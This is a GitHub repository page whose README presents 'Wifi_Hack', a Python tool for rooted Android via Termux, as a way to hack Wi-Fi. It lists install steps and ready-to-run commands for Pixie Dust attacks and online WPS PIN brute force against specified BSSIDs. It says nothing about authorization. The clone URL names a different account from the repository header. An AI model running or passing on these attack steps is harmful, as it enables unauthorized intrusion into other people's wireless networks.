Skip to content

DARK-NI/Wifi_Hack

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 

Repository files navigation

Wifi Hacking Tool

DARK-NI

Not Working In Fake Root

Hack WIfi Using Termux! (Requires Root)

Installation :

$ apt update && apt upgrade
$ pkg install -y root-repo
$ pkg install -y git tsu python wpa-supplicant pixiewps iw
$ git clone https://github.com/Mahfuz-THBD/Wifi_Hack
$ cd Wifi_Hack
$ chmod +x birihack.py
$ sudo python birihack.py --help

Example : sudo python birihack.py -i wlan0 -K

Note:

First turn off your Wifi.

  • Show avaliable networks and start Pixie Dust attack on a specified network.
  • sudo python birihack.py -i wlan0 -K
    • Start Pixie Dust attack on a specified BSSID: sudo python birihack.py -i wlan0 -b 00:91:4C:C3:AC:28 -K
  • Launch online WPS bruteforce with the specified first half of the PIN:
  • sudo python birihack.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

Troubleshooting

"Device or resource busy (-16)" - Turn on Wifi and Then Turn off Wifi.

©️THBD

About

You Can H@ck Wifi With Your Rooted Android Device.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%